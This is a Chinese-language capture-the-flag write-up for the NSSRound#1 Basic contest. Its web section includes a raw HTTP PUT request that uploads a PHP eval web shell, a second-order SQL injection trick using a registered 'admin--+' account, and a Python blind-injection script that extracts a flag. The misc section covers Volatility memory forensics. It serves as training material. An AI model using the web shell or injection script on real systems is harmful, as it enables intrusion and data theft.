[NSSRound＃1 Basic]

WEB

basic_check

发现允许PUT方法请求

PUT /shell.php HTTP/1.1
Host: 1.14.71.254:28848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

<?php eval($_POST[1]);?>

写入一句话
rce即可

Basic]sql_by_sql

先注册，进去有个修改密码
可能是二次注入

修改密码处源码

<!-- update user set password='%s' where username='%s'; -->

重新注册一个admin--+
获得admin身份

在/query下查询

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2022/8/3 21:42
# @Author : ki10Moc
# @FileName: [NSSRound#1 Basic]sql_by_sql.py
# @Software: PyCharm
# Link: ki10.top


import requests
import string

str = string.ascii_letters + string.digits

url = "http://1.14.71.254:28697/query"
s = requests.session()
headers = {
    'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}

if __name__ == "__main__":
    name = ''
    for i in range(0,100):
        char = ''
        for j in str:
            #表+字段
            #payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
            #数据
            payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
            data = {
    "id": payload}
            r = s.post(url=url, data=data, headers=headers)
            #print(r.text)
            if "exist" in r.text:
                name += j
                print (j, end='')
                char = j
                break
        if char == '%':
            break

MISC

cut_into_thirds

python vol.py -f ./cut_into_thirds.raw imageinfo

得到版本号

python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist

这有个引人注意的进程

获取dump文件

python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 memdump -p 1164 -D ./ 

foremost分离得到part1

part1:3930653363343839PK?

直接dump目标文件

python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 procdump -p 1164 -D ./ 

并查找相关信息

strings ./executable.1164.exe 

得到part2

part2:GRRGGYJNGQ4GKMBNMJRTONI=

最后查看用户信息得到part3

分别进行base16、32、64解密即可